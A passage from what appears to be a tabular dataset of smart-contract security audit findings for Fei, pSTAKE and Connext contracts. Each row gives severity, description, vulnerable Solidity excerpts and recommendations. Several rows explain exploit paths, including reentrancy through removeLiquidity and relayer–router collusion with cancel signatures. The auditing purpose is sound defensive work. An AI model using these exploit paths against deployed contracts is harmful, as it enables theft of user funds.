to the inline comment both `tokenSpent` and `tokenReceived` should be immutable but they are not declared as such.\\n```\\n// tokenSpent and tokenReceived are immutable\\ntokenSpent = \\_tokenSpent;\\ntokenReceived = \\_tokenReceived;\\n```\\n\\n```\\n/// @notice the token to be auctioned\\naddress public override tokenSpent;\\n\\n/// @notice the token to buy\\naddress public override tokenReceived;\\n```\\n,Declare both variables `immutable`.,,```\\n// tokenSpent and tokenReceived are immutable\\ntokenSpent = \\_tokenSpent;\\ntokenReceived = \\_tokenReceived;\\n```\\n +CollateralizationOracle - potentially unsafe casts,low,"`protocolControlledValue` is the cumulative USD token value of all tokens in the PCV. The USD value is determined using external chainlink oracles. To prevent some effects of attacks on chainlink from propagating to this protocol, it is recommended to implement a defensive approach to handling values derived from the external source. Arithmetic overflows are checked by the compiler (0.8.4), however, it does not guarantee safe casting from unsigned to signed integer. 
The scenario of this happening might be rather unlikely, however, there is no guarantee that the external price-feed is not taken over by malicious actors and this is when every line of defense counts.\\n```\\n//solidity 0.8.7\\n » int(uint(2\\*\\*255))\\n-57896044618658097711785492504343953926634992332820282019728792003956564819968\\n » int(uint(2\\*\\*255-2))\\n57896044618658097711785492504343953926634992332820282019728792003956564819966\\n```\\n\\n```\\nprotocolEquity = int256(protocolControlledValue) - int256(userCirculatingFei);\\n```\\n\\n```\\nprotocolControlledValue += \\_oraclePrice.mul(\\_totalTokenBalance).asUint256();\\n```\\n",Perform overflow checked SafeCast as another line of defense against oracle manipulation.,,```\\n//solidity 0.8.7\\n » int(uint(2\\*\\*255))\\n-57896044618658097711785492504343953926634992332820282019728792003956564819968\\n » int(uint(2\\*\\*255-2))\\n57896044618658097711785492504343953926634992332820282019728792003956564819966\\n```\\n +FeiTimedMinter - constructor does not enforce the same boundaries as setter for frequency,low,"The setter method for `frequency` enforced upper and lower bounds while the constructor does not. 
Users cannot trust that the `frequency` is actually set to be within bounds on deployment.\\n```\\nconstructor(\\n address \\_core,\\n address \\_target,\\n uint256 \\_incentive,\\n uint256 \\_frequency,\\n uint256 \\_initialMintAmount\\n)\\n CoreRef(\\_core)\\n Timed(\\_frequency)\\n Incentivized(\\_incentive)\\n RateLimitedMinter((\\_initialMintAmount + \\_incentive) / \\_frequency, (\\_initialMintAmount + \\_incentive), true)\\n{\\n \\_initTimed();\\n\\n \\_setTarget(\\_target);\\n \\_setMintAmount(\\_initialMintAmount);\\n}\\n```\\n\\n```\\nfunction setFrequency(uint256 newFrequency) external override onlyGovernorOrAdmin {\\n require(newFrequency >= MIN\\_MINT\\_FREQUENCY, ""FeiTimedMinter: frequency low"");\\n require(newFrequency <= MAX\\_MINT\\_FREQUENCY, ""FeiTimedMinter: frequency high"");\\n\\n \\_setDuration(newFrequency);\\n}\\n```\\n",Perform the same checks on `frequency` in the constructor as in the `setFrequency` method.\\nThis contract is also inherited by a range of contracts that might specify different boundaries to what is hardcoded in the `FeiTimedMinter`. 
A way to enforce bounds-checks could be to allow overriding the setter method and using the setter in the constructor as well ensuring that bounds are also checked on deployment.,,"```\\nconstructor(\\n address \\_core,\\n address \\_target,\\n uint256 \\_incentive,\\n uint256 \\_frequency,\\n uint256 \\_initialMintAmount\\n)\\n CoreRef(\\_core)\\n Timed(\\_frequency)\\n Incentivized(\\_incentive)\\n RateLimitedMinter((\\_initialMintAmount + \\_incentive) / \\_frequency, (\\_initialMintAmount + \\_incentive), true)\\n{\\n \\_initTimed();\\n\\n \\_setTarget(\\_target);\\n \\_setMintAmount(\\_initialMintAmount);\\n}\\n```\\n" +CollateralizationOracle - swapDeposit should call internal functions to remove/add deposits,low,"Instead of calling `removeDeposit` and `addDeposit`, `swapDeposit` should call its internal sister functions `_removeDeposit` and `_addDeposit` to avoid running the `onlyGovernor` checks multiple times.\\n```\\n/// @notice Swap a PCVDeposit with a new one, for instance when a new version\\n/// of a deposit (holding the same token) is deployed.\\n/// @param \\_oldDeposit : the PCVDeposit to remove from the list.\\n/// @param \\_newDeposit : the PCVDeposit to add to the list.\\nfunction swapDeposit(address \\_oldDeposit, address \\_newDeposit) external onlyGovernor {\\n removeDeposit(\\_oldDeposit);\\n addDeposit(\\_newDeposit);\\n}\\n```\\n",Call the internal functions instead. 
addDeposit's and removeDeposit's visibility can then be changed from `public` to `external`.,,"```\\n/// @notice Swap a PCVDeposit with a new one, for instance when a new version\\n/// of a deposit (holding the same token) is deployed.\\n/// @param \\_oldDeposit : the PCVDeposit to remove from the list.\\n/// @param \\_newDeposit : the PCVDeposit to add to the list.\\nfunction swapDeposit(address \\_oldDeposit, address \\_newDeposit) external onlyGovernor {\\n removeDeposit(\\_oldDeposit);\\n addDeposit(\\_newDeposit);\\n}\\n```\\n" +CollateralizationOracle - misleading comments,low,"According to an inline comment in `isOvercollateralized`, the validity status of `pcvStats` is ignored, while it is actually being checked.\\nSimilarly, a comment in `pcvStats` mentions that the returned `protocolEquity` is 0 if there is less PCV than circulating FEI, while in reality, `pcvStats` always returns the difference between the former and the latter, even if it is negative.\\n```\\n/// Controlled Value) than the circulating (user-owned) FEI, i.e.\\n/// a positive Protocol Equity.\\n/// Note: the validity status is ignored in this function.\\nfunction isOvercollateralized() external override view whenNotPaused returns (bool) {\\n (,, int256 \\_protocolEquity, bool \\_valid) = pcvStats();\\n require(\\_valid, ""CollateralizationOracle: reading is invalid"");\\n return \\_protocolEquity > 0;\\n}\\n```\\n\\n```\\n/// @return protocolEquity : the difference between PCV and user circulating FEI.\\n/// If there are more circulating FEI than $ in the PCV, equity is 0.\\n```\\n\\n```\\nprotocolEquity = int256(protocolControlledValue) - int256(userCirculatingFei);\\n```\\n",Revise the comments.,,"```\\n/// Controlled Value) than the circulating (user-owned) FEI, i.e.\\n/// a positive Protocol Equity.\\n/// Note: the validity status is ignored in this function.\\nfunction isOvercollateralized() external override view whenNotPaused returns (bool) {\\n (,, int256 \\_protocolEquity, bool 
\\_valid) = pcvStats();\\n require(\\_valid, ""CollateralizationOracle: reading is invalid"");\\n return \\_protocolEquity > 0;\\n}\\n```\\n" +The withdrawUnstakedTokens may run out of gas,high,"The `withdrawUnstakedTokens` is iterating over all batches of unstaked tokens. One user, if unstaked many times, could get their tokens stuck in the contract.\\n```\\nfunction withdrawUnstakedTokens(address staker)\\n public\\n virtual\\n override\\n whenNotPaused\\n{\\n require(staker == \\_msgSender(), ""LQ20"");\\n uint256 \\_withdrawBalance;\\n uint256 \\_unstakingExpirationLength = \\_unstakingExpiration[staker]\\n .length;\\n uint256 \\_counter = \\_withdrawCounters[staker];\\n for (\\n uint256 i = \\_counter;\\n i < \\_unstakingExpirationLength;\\n i = i.add(1)\\n ) {\\n //get getUnstakeTime and compare it with current timestamp to check if 21 days + epoch difference has passed\\n (uint256 \\_getUnstakeTime, , ) = getUnstakeTime(\\n \\_unstakingExpiration[staker][i]\\n );\\n if (block.timestamp >= \\_getUnstakeTime) {\\n //if 21 days + epoch difference has passed, then add the balance and then mint uTokens\\n \\_withdrawBalance = \\_withdrawBalance.add(\\n \\_unstakingAmount[staker][i]\\n );\\n \\_unstakingExpiration[staker][i] = 0;\\n \\_unstakingAmount[staker][i] = 0;\\n \\_withdrawCounters[staker] = \\_withdrawCounters[staker].add(1);\\n }\\n }\\n\\n require(\\_withdrawBalance > 0, ""LQ21"");\\n emit WithdrawUnstakeTokens(staker, \\_withdrawBalance, block.timestamp);\\n \\_uTokens.mint(staker, \\_withdrawBalance);\\n}\\n```\\n","Resolution\\nComment from pSTAKE Finance team:\\nHave implemented a batchingLimit variable which enforces a definite number of iterations during withdrawal of unstaked tokens, instead of indefinite iterations.\\nLimit the number of processed unstaked batches, and possibly add pagination.",,"```\\nfunction withdrawUnstakedTokens(address staker)\\n public\\n virtual\\n override\\n whenNotPaused\\n{\\n require(staker == \\_msgSender(), 
""LQ20"");\\n uint256 \\_withdrawBalance;\\n uint256 \\_unstakingExpirationLength = \\_unstakingExpiration[staker]\\n .length;\\n uint256 \\_counter = \\_withdrawCounters[staker];\\n for (\\n uint256 i = \\_counter;\\n i < \\_unstakingExpirationLength;\\n i = i.add(1)\\n ) {\\n //get getUnstakeTime and compare it with current timestamp to check if 21 days + epoch difference has passed\\n (uint256 \\_getUnstakeTime, , ) = getUnstakeTime(\\n \\_unstakingExpiration[staker][i]\\n );\\n if (block.timestamp >= \\_getUnstakeTime) {\\n //if 21 days + epoch difference has passed, then add the balance and then mint uTokens\\n \\_withdrawBalance = \\_withdrawBalance.add(\\n \\_unstakingAmount[staker][i]\\n );\\n \\_unstakingExpiration[staker][i] = 0;\\n \\_unstakingAmount[staker][i] = 0;\\n \\_withdrawCounters[staker] = \\_withdrawCounters[staker].add(1);\\n }\\n }\\n\\n require(\\_withdrawBalance > 0, ""LQ21"");\\n emit WithdrawUnstakeTokens(staker, \\_withdrawBalance, block.timestamp);\\n \\_uTokens.mint(staker, \\_withdrawBalance);\\n}\\n```\\n" +The _calculatePendingRewards can run out of gas,medium,"The reward rate in STokens can be changed, and the history of these changes are stored in the contract:\\n```\\nfunction setRewardRate(uint256 rewardRate)\\n public\\n virtual\\n override\\n returns (bool success)\\n{\\n // range checks for rewardRate. Since rewardRate cannot be more than 100%, the max cap\\n // is \\_valueDivisor \\* 100, which then brings the fees to 100 (percentage)\\n require(rewardRate <= \\_valueDivisor.mul(100), ""ST17"");\\n require(hasRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender()), ""ST2"");\\n \\_rewardRate.push(rewardRate);\\n \\_lastMovingRewardTimestamp.push(block.timestamp);\\n emit SetRewardRate(rewardRate);\\n\\n return true;\\n}\\n```\\n\\nWhen the reward is calculated `for` each user, all changes of the `_rewardRate` are considered. So there is a `for` loop that iterates over all changes since the last reward update. 
If the reward rate was changed many times, the `_calculatePendingRewards` function could run out of gas.","Provide an option to partially update the reward, so the full update can be split in multiple transactions.",,"```\\nfunction setRewardRate(uint256 rewardRate)\\n public\\n virtual\\n override\\n returns (bool success)\\n{\\n // range checks for rewardRate. Since rewardRate cannot be more than 100%, the max cap\\n // is \\_valueDivisor \\* 100, which then brings the fees to 100 (percentage)\\n require(rewardRate <= \\_valueDivisor.mul(100), ""ST17"");\\n require(hasRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender()), ""ST2"");\\n \\_rewardRate.push(rewardRate);\\n \\_lastMovingRewardTimestamp.push(block.timestamp);\\n emit SetRewardRate(rewardRate);\\n\\n return true;\\n}\\n```\\n" +The calculateRewards should not be callable by the whitelisted contract,medium,"The `calculateRewards` function should only be called for non-whitelisted addresses:\\n```\\nfunction calculateRewards(address to)\\n public\\n virtual\\n override\\n whenNotPaused\\n returns (bool success)\\n{\\n require(to == \\_msgSender(), ""ST5"");\\n uint256 reward = \\_calculateRewards(to);\\n emit TriggeredCalculateRewards(to, reward, block.timestamp);\\n return true;\\n}\\n```\\n\\nFor all the whitelisted addresses, the `calculateHolderRewards` function is called. 
But if the `calculateRewards` function is called by the whitelisted address directly, the function will execute, and the rewards will be distributed to the caller instead of the intended recipients.","Resolution\\nComment from pSTAKE Finance team:\\nHave created a require condition in Smart Contract code to disallow whitelisted contracts from calling the function\\nWhile this scenario is unlikely to happen, adding the additional check in the `calculateRewards` is a good option.",,"```\\nfunction calculateRewards(address to)\\n public\\n virtual\\n override\\n whenNotPaused\\n returns (bool success)\\n{\\n require(to == \\_msgSender(), ""ST5"");\\n uint256 reward = \\_calculateRewards(to);\\n emit TriggeredCalculateRewards(to, reward, block.timestamp);\\n return true;\\n}\\n```\\n" +Presence of testnet code,medium,"Based on the discussions with pStake team and in-line comments, there are a few instances of code and commented code in the code base under audit that are not finalized for mainnet deployment.\\n```\\nfunction initialize(address pauserAddress) public virtual initializer {\\n \\_\\_ERC20\\_init(""pSTAKE Token"", ""PSTAKE"");\\n \\_\\_AccessControl\\_init();\\n \\_\\_Pausable\\_init();\\n \\_setupRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender());\\n \\_setupRole(PAUSER\\_ROLE, pauserAddress);\\n // PSTAKE IS A SIMPLE ERC20 TOKEN HENCE 18 DECIMAL PLACES\\n \\_setupDecimals(18);\\n // pre-allocate some tokens to an admin address which will air drop PSTAKE tokens\\n // to each of holder contracts. This is only for testnet purpose. 
in Mainnet, we\\n // will use a vesting contract to allocate tokens to admin in a certain schedule\\n \\_mint(\\_msgSender(), 5000000000000000000000000);\\n}\\n```\\n\\nThe initialize function currently mints all the tokens to msg.sender, however the goal for mainnet is to use a vesting contract which is not present in the current code.",It is recommended to fully test the final code before deployment to the mainnet.,,"```\\nfunction initialize(address pauserAddress) public virtual initializer {\\n \\_\\_ERC20\\_init(""pSTAKE Token"", ""PSTAKE"");\\n \\_\\_AccessControl\\_init();\\n \\_\\_Pausable\\_init();\\n \\_setupRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender());\\n \\_setupRole(PAUSER\\_ROLE, pauserAddress);\\n // PSTAKE IS A SIMPLE ERC20 TOKEN HENCE 18 DECIMAL PLACES\\n \\_setupDecimals(18);\\n // pre-allocate some tokens to an admin address which will air drop PSTAKE tokens\\n // to each of holder contracts. This is only for testnet purpose. in Mainnet, we\\n // will use a vesting contract to allocate tokens to admin in a certain schedule\\n \\_mint(\\_msgSender(), 5000000000000000000000000);\\n}\\n```\\n" +Sanity check on all important variables,low,"Most of the functionalities have proper sanity checks when it comes to setting system-wide variables, such as whitelist addresses. 
However there are a few key setters that lack such sanity checks.\\nSanity check (!= address(0)) on all token contracts.\\n```\\nfunction setUTokensContract(address uAddress) public virtual override {\\n require(hasRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender()), ""LP9"");\\n \\_uTokens = IUTokens(uAddress);\\n emit SetUTokensContract(uAddress);\\n}\\n\\n/\\*\\*\\n \\* @dev Set 'contract address', called from constructor\\n \\* @param sAddress: stoken contract address\\n \\*\\n \\* Emits a {SetSTokensContract} event with '\\_contract' set to the stoken contract address.\\n \\*\\n \\*/\\nfunction setSTokensContract(address sAddress) public virtual override {\\n require(hasRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender()), ""LP10"");\\n \\_sTokens = ISTokens(sAddress);\\n emit SetSTokensContract(sAddress);\\n}\\n\\n/\\*\\*\\n \\* @dev Set 'contract address', called from constructor\\n \\* @param pstakeAddress: pStake contract address\\n \\*\\n \\* Emits a {SetPSTAKEContract} event with '\\_contract' set to the stoken contract address.\\n \\*\\n \\*/\\nfunction setPSTAKEContract(address pstakeAddress) public virtual override {\\n require(hasRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender()), ""LP11"");\\n \\_pstakeTokens = IPSTAKE(pstakeAddress);\\n emit SetPSTAKEContract(pstakeAddress);\\n}\\n```\\n\\nSanity check on `unstakingLockTime` to be in the acceptable range (21 hours to 21 days)\\n```\\n/\\*\\*\\n \\* @dev Set 'unstake props', called from admin\\n \\* @param unstakingLockTime: varies from 21 hours to 21 days\\n \\*\\n \\* Emits a {SetUnstakeProps} event with 'fee' set to the stake and unstake.\\n \\*\\n \\*/\\nfunction setUnstakingLockTime(uint256 unstakingLockTime)\\n public\\n virtual\\n returns (bool success)\\n{\\n require(hasRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender()), ""LQ3"");\\n \\_unstakingLockTime = unstakingLockTime;\\n emit SetUnstakingLockTime(unstakingLockTime);\\n return true;\\n}\\n```\\n","Resolution\\nComment from pSTAKE Finance team:\\nPost the 
implementation of new emission logic there have been a rearrangement of some variables, but the rest have been sanity tested and corrected",,"```\\nfunction setUTokensContract(address uAddress) public virtual override {\\n require(hasRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender()), ""LP9"");\\n \\_uTokens = IUTokens(uAddress);\\n emit SetUTokensContract(uAddress);\\n}\\n\\n/\\*\\*\\n \\* @dev Set 'contract address', called from constructor\\n \\* @param sAddress: stoken contract address\\n \\*\\n \\* Emits a {SetSTokensContract} event with '\\_contract' set to the stoken contract address.\\n \\*\\n \\*/\\nfunction setSTokensContract(address sAddress) public virtual override {\\n require(hasRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender()), ""LP10"");\\n \\_sTokens = ISTokens(sAddress);\\n emit SetSTokensContract(sAddress);\\n}\\n\\n/\\*\\*\\n \\* @dev Set 'contract address', called from constructor\\n \\* @param pstakeAddress: pStake contract address\\n \\*\\n \\* Emits a {SetPSTAKEContract} event with '\\_contract' set to the stoken contract address.\\n \\*\\n \\*/\\nfunction setPSTAKEContract(address pstakeAddress) public virtual override {\\n require(hasRole(DEFAULT\\_ADMIN\\_ROLE, \\_msgSender()), ""LP11"");\\n \\_pstakeTokens = IPSTAKE(pstakeAddress);\\n emit SetPSTAKEContract(pstakeAddress);\\n}\\n```\\n" +TransactionManager - Receiver-side check also on sending side Fix,high,"The functions `prepare`, `cancel`, and `fulfill` in the `TransactionManager` all have a “common part” that is executed on both the sending and the receiving chain and side-specific parts that are only executed either on the sending or on the receiving side.\\nThe following lines occur in fulfill's common part, but this should only be checked on the receiving chain. In fact, on the sending chain, we might even compare amounts of different assets.\\n```\\n// Sanity check: fee <= amount. 
Allow `=` in case of only wanting to execute\\n// 0-value crosschain tx, so only providing the fee amount\\nrequire(relayerFee <= txData.amount, ""#F:023"");\\n```\\n\\nThis could prevent a legitimate `fulfill` on the sending chain, causing a loss of funds for the router.","Resolution\\nThe Connext team claims to have fixed this in commit `4adbfd52703441ee5de655130fc2e0252eae4661`. We have not reviewed this commit or, generally, the codebase at this point.\\nMove these lines to the receiving-side part.\\nRemark\\nThe `callData` supplied to `fulfill` is not used at all on the sending chain, but the check whether its hash matches `txData.callDataHash` happens in the common part.\\n```\\n// Check provided callData matches stored hash\\nrequire(keccak256(callData) == txData.callDataHash, ""#F:024"");\\n```\\n\\nIn principle, this check could also be moved to the receiving-chain part, allowing the router to save some gas by calling sending-side `fulfill` with empty `callData` and skip the check. Note, however, that the `TransactionFulfilled` event will then also emit the “wrong” `callData` on the sending chain, so the off-chain code has to be able to deal with that if you want to employ this optimization.",,"```\\n// Sanity check: fee <= amount. 
Allow `=` in case of only wanting to execute\\n// 0-value crosschain tx, so only providing the fee amount\\nrequire(relayerFee <= txData.amount, ""#F:023"");\\n```\\n" +TransactionManager - Missing nonReentrant modifier on removeLiquidity,medium,"Resolution\\nThis issue has been fixed.\\nThe `removeLiquidity` function does not have a `nonReentrant` modifier.\\n```\\n/\\*\\*\\n \\* @notice This is used by any router to decrease their available\\n \\* liquidity for a given asset.\\n \\* @param shares The amount of liquidity to remove for the router in shares\\n \\* @param assetId The address (or `address(0)` if native asset) of the\\n \\* asset you're removing liquidity for\\n \\* @param recipient The address that will receive the liquidity being removed\\n \\*/\\nfunction removeLiquidity(\\n uint256 shares,\\n address assetId,\\n address payable recipient\\n) external override {\\n // Sanity check: recipient is sensible\\n require(recipient != address(0), ""#RL:007"");\\n\\n // Sanity check: nonzero shares\\n require(shares > 0, ""#RL:035"");\\n\\n // Get stored router shares\\n uint256 routerShares = issuedShares[msg.sender][assetId];\\n\\n // Get stored outstanding shares\\n uint256 outstanding = outstandingShares[assetId];\\n\\n // Sanity check: owns enough shares\\n require(routerShares >= shares, ""#RL:018"");\\n\\n // Convert shares to amount\\n uint256 amount = getAmountFromIssuedShares(\\n shares,\\n outstanding,\\n Asset.getOwnBalance(assetId)\\n );\\n\\n // Update router issued shares\\n // NOTE: unchecked due to require above\\n unchecked {\\n issuedShares[msg.sender][assetId] = routerShares - shares;\\n }\\n\\n // Update the total shares for asset\\n outstandingShares[assetId] = outstanding - shares;\\n\\n // Transfer from contract to specified recipient\\n Asset.transferAsset(assetId, recipient, amount);\\n\\n // Emit event\\n emit LiquidityRemoved(\\n msg.sender,\\n assetId,\\n shares,\\n amount,\\n recipient\\n );\\n}\\n```\\n\\nAssuming we're dealing 
with a token contract that allows execution of third-party-supplied code, that means it is possible to leave the `TransactionManager` contract in one of the functions that call into the token contract and then reenter via `removeLiquidity`. Alternatively, we can leave the contract in `removeLiquidity` and reenter through an arbitrary external function, even if it has a `nonReentrant` modifier.\\nExample\\nAssume a token contract allows the execution of third-party-supplied code in its `transfer` function before the actual balance change takes place. If a router calls `removeLiquidity` with half of their shares and then, in a reentering `removeLiquidity` call, supplies the other half of their shares, they will receive more tokens than if they had liquidated all their shares at once because the reentering call occurs after the (first half of the) shares have been burnt but before the corresponding amount of tokens has actually been transferred out of the contract, leading to an artificially increased share value in the reentering call. Similarly, reentering the contract with a `fulfill` call on the receiving chain instead of a second `removeLiquidity` would `transfer` too many tokens to the recipient due to the artificially inflated share value.","While tokens that behave as described in the example might be rare or not exist at all, caution is advised when integrating with unknown tokens or calling untrusted code in general. 
We strongly recommend adding a `nonReentrant` modifier to `removeLiquidity`.",,"```\\n/\\*\\*\\n \\* @notice This is used by any router to decrease their available\\n \\* liquidity for a given asset.\\n \\* @param shares The amount of liquidity to remove for the router in shares\\n \\* @param assetId The address (or `address(0)` if native asset) of the\\n \\* asset you're removing liquidity for\\n \\* @param recipient The address that will receive the liquidity being removed\\n \\*/\\nfunction removeLiquidity(\\n uint256 shares,\\n address assetId,\\n address payable recipient\\n) external override {\\n // Sanity check: recipient is sensible\\n require(recipient != address(0), ""#RL:007"");\\n\\n // Sanity check: nonzero shares\\n require(shares > 0, ""#RL:035"");\\n\\n // Get stored router shares\\n uint256 routerShares = issuedShares[msg.sender][assetId];\\n\\n // Get stored outstanding shares\\n uint256 outstanding = outstandingShares[assetId];\\n\\n // Sanity check: owns enough shares\\n require(routerShares >= shares, ""#RL:018"");\\n\\n // Convert shares to amount\\n uint256 amount = getAmountFromIssuedShares(\\n shares,\\n outstanding,\\n Asset.getOwnBalance(assetId)\\n );\\n\\n // Update router issued shares\\n // NOTE: unchecked due to require above\\n unchecked {\\n issuedShares[msg.sender][assetId] = routerShares - shares;\\n }\\n\\n // Update the total shares for asset\\n outstandingShares[assetId] = outstanding - shares;\\n\\n // Transfer from contract to specified recipient\\n Asset.transferAsset(assetId, recipient, amount);\\n\\n // Emit event\\n emit LiquidityRemoved(\\n msg.sender,\\n assetId,\\n shares,\\n amount,\\n recipient\\n );\\n}\\n```\\n" +TransactionManager - Relayer may use user's cancel after expiry signature to steal user's funds by colluding with a router Acknowledged,medium,"Users that are willing to have a lower trust dependency on a relayer should have the ability to opt-in only for the service that allows the relayer to withdraw 
back users' funds from the sending chain after expiry. However, in practice, a user is forced to opt-in for the service that refunds the router before the expiry, since the same signature is used for both services (lines 795,817 use the same signature).\\nLet's consider the case of a user willing to call `fulfill` on his own, but to use the relayer only to withdraw back his funds from the sending chain after expiry. In this case, the relayer can collude with the router and use the user's `cancel` signature (meant for withdrawing his only after expiry) as a front-running transaction for a user call to `fulfill`. This way the router will be able to withdraw both his funds and the user's funds since the user's `fulfill` signature is now public data residing in the mem-pool.\\n```\\n require(msg.sender == txData.user || recoverSignature(txData.transactionId, relayerFee, ""cancel"", signature) == txData.user, ""#C:022"");\\n\\n Asset.transferAsset(txData.sendingAssetId, payable(msg.sender), relayerFee);\\n }\\n\\n // Get the amount to refund the user\\n uint256 toRefund;\\n unchecked {\\n toRefund = amount - relayerFee;\\n }\\n\\n // Return locked funds to sending chain fallback\\n if (toRefund > 0) {\\n Asset.transferAsset(txData.sendingAssetId, payable(txData.sendingChainFallback), toRefund);\\n }\\n }\\n\\n} else {\\n // Receiver side, router liquidity is returned\\n if (txData.expiry >= block.timestamp) {\\n // Timeout has not expired and tx may only be cancelled by user\\n // Validate signature\\n require(msg.sender == txData.user || recoverSignature(txData.transactionId, relayerFee, ""cancel"", signature) == txData.user, ""#C:022"");\\n```\\n","The crucial point here is that the user must never sign a “cancel” that could be used on the receiving chain while fulfillment on the sending chain is still a possibility.\\nOr, to put it differently: A user may only sign a “cancel” that is valid on the receiving chain after sending-chain expiry or if they never have and 
won't ever sign a “fulfill” (or at least won't sign until sending-chain expiry — but it is pointless to sign a “fulfill” after that, so “never” is a reasonable simplification).\\nOr, finally, a more symmetric perspective on this requirement: If a user has signed “fulfill”, they must not sign a receiving-chain-valid “cancel” until sending-chain expiry, and if they have signed a receiving-chain-valid “cancel”, they must not sign a “fulfill” (until sending-chain expiry).\\nIn this sense, “cancel” signatures that are valid on the receiving chain are dangerous, while sending-side cancellations are not. So the principle stated in the previous paragraph might be easier to follow with different signatures for sending- and receiving-chain cancellations.",,"```\\n require(msg.sender == txData.user || recoverSignature(txData.transactionId, relayerFee, ""cancel"", signature) == txData.user, ""#C:022"");\\n\\n Asset.transferAsset(txData.sendingAssetId, payable(msg.sender), relayerFee);\\n }\\n\\n // Get the amount to refund the user\\n uint256 toRefund;\\n unchecked {\\n toRefund = amount - relayerFee;\\n }\\n\\n // Return locked funds to sending chain fallback\\n if (toRefund > 0) {\\n Asset.transferAsset(txData.sendingAssetId, payable(txData.sendingChainFallback), toRefund);\\n }\\n }\\n\\n} else {\\n // Receiver side, router liquidity is returned\\n if (txData.expiry >= block.timestamp) {\\n // Timeout has not expired and tx may only be cancelled by user\\n // Validate signature\\n require(msg.sender == txData.user || recoverSignature(txData.transactionId, relayerFee, ""cancel"", signature) == txData.user, ""#C:022"");\\n```\\n" +ProposedOwnable - two-step ownership transfer should be confirmed by the new owner,medium,"In order to avoid losing control of the contract, the two-step ownership transfer should be confirmed by the new owner's address instead of the current owner.\\n`acceptProposedOwner` is restricted to `onlyOwner` while ownership should be accepted by the 
newOwner\\n```\\n/\\*\\*\\n \\* @notice Transfers ownership of the contract to a new account (`newOwner`).\\n \\* Can only be called by the current owner.\\n \\*/\\nfunction acceptProposedOwner() public virtual onlyOwner {\\n require((block.timestamp - \\_proposedTimestamp) > \\_delay, ""#APO:030"");\\n \\_setOwner(\\_proposed);\\n}\\n```\\n\\nmove `renounced()` to `ProposedOwnable` as this is where it logically belongs to\\n```\\nfunction renounced() public view override returns (bool) {\\n return owner() == address(0);\\n}\\n```\\n\\n`onlyOwner` can directly access state-var `_owner` instead of spending more gas on calling `owner()`\\n```\\nmodifier onlyOwner() {\\n require(owner() == msg.sender, ""#OO:029"");\\n \\_;\\n}\\n```\\n","Resolution\\nAll recommendations given below have been implemented. In addition to that, the privilege to manage assets and the privilege to manage routers can now be renounced separately.\\n`onlyOwner` can directly access `_owner` (gas optimization)\\nadd a method to explicitly renounce ownership of the contract\\nmove `TransactionManager.renounced()` to `ProposedOwnable` as this is where it logically belongs to\\nchange the access control for `acceptProposedOwner` from `onlyOwner` to `require(msg.sender == _proposed)` (new owner).",,"```\\n/\\*\\*\\n \\* @notice Transfers ownership of the contract to a new account (`newOwner`).\\n \\* Can only be called by the current owner.\\n \\*/\\nfunction acceptProposedOwner() public virtual onlyOwner {\\n require((block.timestamp - \\_proposedTimestamp) > \\_delay, ""#APO:030"");\\n \\_setOwner(\\_proposed);\\n}\\n```\\n" +FulfillInterpreter - Wrong order of actions in fallback handling,low,"When a transaction with a `callTo` that is not `address(0)` is fulfilled, the funds to be withdrawn on the user's behalf are first transferred to the `FulfillInterpreter` instance that is associated with this `TransactionManager` instance. 
After that, `execute` is called on that interpreter instance, which, in turn, tries to make a call to `callTo`. If that call reverts or isn't made in the first place because `callTo` is not a contract address, the funds are transferred directly to the `receivingAddress` in the transaction (which becomes `fallbackAddress` in execute); otherwise, it's the called contract's task to transfer the previously approved funds from the interpreter.\\n```\\nbool isNative = LibAsset.isNativeAsset(assetId);\\nif (!isNative) {\\n LibAsset.increaseERC20Allowance(assetId, callTo, amount);\\n}\\n\\n// Check if the callTo is a contract\\nbool success;\\nbytes memory returnData;\\nif (Address.isContract(callTo)) {\\n // Try to execute the callData\\n // the low level call will return `false` if its execution reverts\\n (success, returnData) = callTo.call{value: isNative ? amount : 0}(callData);\\n}\\n\\n// Handle failure cases\\nif (!success) {\\n // If it fails, transfer to fallback\\n LibAsset.transferAsset(assetId, fallbackAddress, amount);\\n // Decrease allowance\\n if (!isNative) {\\n LibAsset.decreaseERC20Allowance(assetId, callTo, amount);\\n }\\n}\\n```\\n\\nFor the fallback scenario, i.e., the call isn't executed or fails, the funds are first transferred to `fallbackAddress`, and the previously increased allowance is decreased after that. If the token supports it, the recipient of the direct transfer could try to exploit that the approval hasn't been revoked yet, so the logically correct order is to decrease the allowance first and transfer the funds later. However, it should be noted that the `FulfillInterpreter` should, at any point in time, only hold the funds that are supposed to be transferred as part of the current transaction; if there are any excess funds, these are leftovers from a previous failure to withdraw everything that could have been withdrawn, so these can be considered up for grabs. 
Hence, this is only a minor issue.","We recommend reversing the order of actions for the fallback case: Decrease the allowance first, and transfer later. Moreover, it would be better to increase the allowance only in case a call will actually be made, i.e., if `Address.isContract(callTo)` is `true`.\\nRemark\\nThis issue was already present in the original version of the code but was missed initially and only found during the re-audit.",,"```\\nbool isNative = LibAsset.isNativeAsset(assetId);\\nif (!isNative) {\\n LibAsset.increaseERC20Allowance(assetId, callTo, amount);\\n}\\n\\n// Check if the callTo is a contract\\nbool success;\\nbytes memory returnData;\\nif (Address.isContract(callTo)) {\\n // Try to execute the callData\\n // the low level call will return `false` if its execution reverts\\n (success, returnData) = callTo.call{value: isNative ? amount : 0}(callData);\\n}\\n\\n// Handle failure cases\\nif (!success) {\\n // If it fails, transfer to fallback\\n LibAsset.transferAsset(assetId, fallbackAddress, amount);\\n // Decrease allowance\\n if (!isNative) {\\n LibAsset.decreaseERC20Allowance(assetId, callTo, amount);\\n }\\n}\\n```\\n" +FulfillInterpreter - Missing check whether callTo address contains code,low,"Resolution\\nThis issue has been fixed.\\nThe receiver-side `prepare` checks whether the `callTo` address is either zero or a contract:\\n```\\n// Check that the callTo is a contract\\n// NOTE: This cannot happen on the sending chain (different chain\\n// contexts), so a user could mistakenly create a transfer that must be\\n// cancelled if this is incorrect\\nrequire(invariantData.callTo == address(0) || Address.isContract(invariantData.callTo), ""#P:031"");\\n```\\n\\nHowever, as a contract 